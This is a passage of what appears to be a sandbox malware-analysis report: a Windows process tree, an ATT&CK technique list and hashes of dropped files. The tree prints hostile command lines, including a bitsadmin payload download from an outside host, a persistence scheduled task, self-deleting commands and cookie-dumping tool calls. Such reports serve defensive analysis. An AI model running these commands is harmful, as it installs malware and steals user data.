                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ah1kairk.1ac\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ah1kairk.1ac\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619862689 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                            8⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5980
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f5vin1qd.ylo\gpooe.exe & exit
                                                                                                        6⤵
                                                                                                          PID:2588
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\f5vin1qd.ylo\gpooe.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\f5vin1qd.ylo\gpooe.exe
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5136
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3364
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3664
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\erdfq2cj.ttd\google-game.exe & exit
                                                                                                          6⤵
                                                                                                            PID:5960
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\erdfq2cj.ttd\google-game.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\erdfq2cj.ttd\google-game.exe
                                                                                                              7⤵
                                                                                                                PID:2176
                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                  8⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Modifies registry class
                                                                                                                  PID:2780
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v32tjutm.f0c\y1.exe & exit
                                                                                                              6⤵
                                                                                                                PID:5684
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\v32tjutm.f0c\y1.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\v32tjutm.f0c\y1.exe
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:2176
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\f2OMMFaUjy.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\f2OMMFaUjy.exe"
                                                                                                                    8⤵
                                                                                                                      PID:7080
                                                                                                                      • C:\Users\Admin\AppData\Roaming\1620122019796.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\1620122019796.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620122019796.txt"
                                                                                                                        9⤵
                                                                                                                          PID:6204
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\f2OMMFaUjy.exe"
                                                                                                                          9⤵
                                                                                                                            PID:6804
                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                              ping 127.0.0.1 -n 3
                                                                                                                              10⤵
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:2680
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\v32tjutm.f0c\y1.exe"
                                                                                                                          8⤵
                                                                                                                            PID:4004
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                              9⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:1364
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zsxjozht.ste\askinstall39.exe & exit
                                                                                                                        6⤵
                                                                                                                          PID:5644
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zsxjozht.ste\askinstall39.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\zsxjozht.ste\askinstall39.exe
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:360
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                              8⤵
                                                                                                                                PID:2352
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  9⤵
                                                                                                                                    PID:5088
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                    9⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:6280
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\neq5cc5x.udf\setup.exe & exit
                                                                                                                              6⤵
                                                                                                                                PID:5088
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\neq5cc5x.udf\setup.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\neq5cc5x.udf\setup.exe
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:6248
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\neq5cc5x.udf\setup.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:6616
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                        9⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:6840
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\odqeh0jb.52h\SunLabsPlayer.exe /S & exit
                                                                                                                                  6⤵
                                                                                                                                    PID:6448
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\odqeh0jb.52h\SunLabsPlayer.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\odqeh0jb.52h\SunLabsPlayer.exe /S
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:6624
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAAFD.tmp\tempfile.ps1"
                                                                                                                                        8⤵
                                                                                                                                          PID:7128
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAAFD.tmp\tempfile.ps1"
                                                                                                                                          8⤵
                                                                                                                                            PID:7036
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAAFD.tmp\tempfile.ps1"
                                                                                                                                            8⤵
                                                                                                                                              PID:5992
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAAFD.tmp\tempfile.ps1"
                                                                                                                                              8⤵
                                                                                                                                                PID:6880
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  9⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:6176
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAAFD.tmp\tempfile.ps1"
                                                                                                                                                8⤵
                                                                                                                                                  PID:4756
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    9⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3852
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAAFD.tmp\tempfile.ps1"
                                                                                                                                                  8⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5720
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAAFD.tmp\tempfile.ps1"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:2960
                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                    8⤵
                                                                                                                                                    • Download via BitsAdmin
                                                                                                                                                    PID:792
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30aibkpt.hbs\005.exe & exit
                                                                                                                                                6⤵
                                                                                                                                                  PID:6712
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\30aibkpt.hbs\005.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\30aibkpt.hbs\005.exe
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:6948
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dcbn4qtw.w0a\ifhwwyy.exe & exit
                                                                                                                                                  6⤵
                                                                                                                                                    PID:6988
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\dcbn4qtw.w0a\ifhwwyy.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\dcbn4qtw.w0a\ifhwwyy.exe
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:7096
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:2568
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:7024
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wnvnahue.cpj\toolspab1.exe & exit
                                                                                                                                                    6⤵
                                                                                                                                                      PID:6644
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wnvnahue.cpj\toolspab1.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\wnvnahue.cpj\toolspab1.exe
                                                                                                                                                        7⤵
                                                                                                                                                          PID:7008
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wnvnahue.cpj\toolspab1.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\wnvnahue.cpj\toolspab1.exe
                                                                                                                                                            8⤵
                                                                                                                                                              PID:7040
                                                                                                                                                • C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:2252
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4000
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                        4⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:4128
                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1064
                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                    1⤵
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    PID:964
                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1008
                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:2292
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:2060
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                        2⤵
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:4300
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                      1⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:4284
                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                      PID:5032
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                      1⤵
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:5892
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                      1⤵
                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:4928
                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                      1⤵
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:5756
                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 2DC17E14BB9B8F6653F636D42E7C0C16 C
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5128
                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 0ED4FB0A2A66CFAA58CA359DC0D6D2EF
                                                                                                                                                        2⤵
                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:6360
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                          3⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:6464
                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 73205F5037647B1A5E3BBAB25433ABAA E Global\MSI0000
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:7076
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\66BA.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\66BA.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:7144
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\66BA.exe
                                                                                                                                                          "{path}"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6056
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4364
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                "schtasks.exe" /create /tn UpdateWindows /tr "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" /st 09:57 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                3⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:3264
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6A54.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\6A54.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5808
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6FE3.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\6FE3.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4632
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2272
                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:7008
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\76DA.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\76DA.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6484
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 736
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5564
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 824
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5684
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 828
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:4732
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 868
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:6464
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 872
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:5012
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6464
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:6968
                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4276
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3876
                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5924
                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:7164
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4028
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4804
                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1752

                                                                                                                                                                                    Network

                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                    Execution

                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                    1
                                                                                                                                                                                    T1053

                                                                                                                                                                                    Persistence

                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                    1
                                                                                                                                                                                    T1060

                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                    1
                                                                                                                                                                                    T1053

                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                    1
                                                                                                                                                                                    T1197

                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                    1
                                                                                                                                                                                    T1053

                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                    3
                                                                                                                                                                                    T1112

                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                    1
                                                                                                                                                                                    T1197

                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                    1
                                                                                                                                                                                    T1130

                                                                                                                                                                                    Credential Access

                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                    4
                                                                                                                                                                                    T1081

                                                                                                                                                                                    Discovery

                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                    1
                                                                                                                                                                                    T1518

                                                                                                                                                                                    Query Registry

                                                                                                                                                                                    5
                                                                                                                                                                                    T1012

                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                    6
                                                                                                                                                                                    T1082

                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                    2
                                                                                                                                                                                    T1120

                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                    1
                                                                                                                                                                                    T1018

                                                                                                                                                                                    Collection

                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                    4
                                                                                                                                                                                    T1005

                                                                                                                                                                                    Command and Control

                                                                                                                                                                                    Web Service

                                                                                                                                                                                    1
                                                                                                                                                                                    T1102

                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                    Downloads

                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                                                                                                                      MD5

                                                                                                                                                                                      6dae43e5255fd03d32db83c9ed731f19

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      5c2a68a017fe5f3c65f59ccdac2ad0b0b69cdd69

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      5800b5569e81d58fd441a585dff6817cf63c875881874eca2d7ff22d547f770e

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      7d0d81077504ffe604e3a526e1bf2edeb714c5b9f460657d75fb063ae41e11c44a193664c8a4b3ba0638521070a94b7b0eb53bdd416b923cf53d190708ef1d12

                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                                                                                                                      MD5

                                                                                                                                                                                      6dae43e5255fd03d32db83c9ed731f19

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      5c2a68a017fe5f3c65f59ccdac2ad0b0b69cdd69

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      5800b5569e81d58fd441a585dff6817cf63c875881874eca2d7ff22d547f770e

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      7d0d81077504ffe604e3a526e1bf2edeb714c5b9f460657d75fb063ae41e11c44a193664c8a4b3ba0638521070a94b7b0eb53bdd416b923cf53d190708ef1d12

                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                                                                                                                                                                                      MD5

                                                                                                                                                                                      1e09b73afa67d8bfe8591eb605cef0e3

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      147fdec45342a0e069dd1aeea2c109440894bef9

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      431c13d939d7460db6ec5f524145a93fae7711d61344fbf1898cea7895480286

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      b74516b1f3d241790537aaaaf9c8b90bd2edbcf2e7693c166b11c260d6689b9e0f2a9c25b5e6787d6c717eb9ad64605b783bdd1ac09a9b50f211112007c27a49

                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                                                                                                                                                                                      MD5

                                                                                                                                                                                      1e09b73afa67d8bfe8591eb605cef0e3

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      147fdec45342a0e069dd1aeea2c109440894bef9

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      431c13d939d7460db6ec5f524145a93fae7711d61344fbf1898cea7895480286

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      b74516b1f3d241790537aaaaf9c8b90bd2edbcf2e7693c166b11c260d6689b9e0f2a9c25b5e6787d6c717eb9ad64605b783bdd1ac09a9b50f211112007c27a49

                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
                                                                                                                                                                                      MD5

                                                                                                                                                                                      86e5afea87de8d8c58f5af9e35cc695a

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      99981daa6c225c917a1461fbb85f4ca5bd0add80

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      6ac9d38a6cb0394484c05cb1eb24c07e2f0ec48eb64cd788f0cff632f86e7935

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      1990629e80a0cbc3bb9b244c27be4c754d58db8b047e174c8caf10db6796db263b199c3b91397aade3bd92595bb5955f5424d5dcd57d69ac6d3e73a55e3ad5df

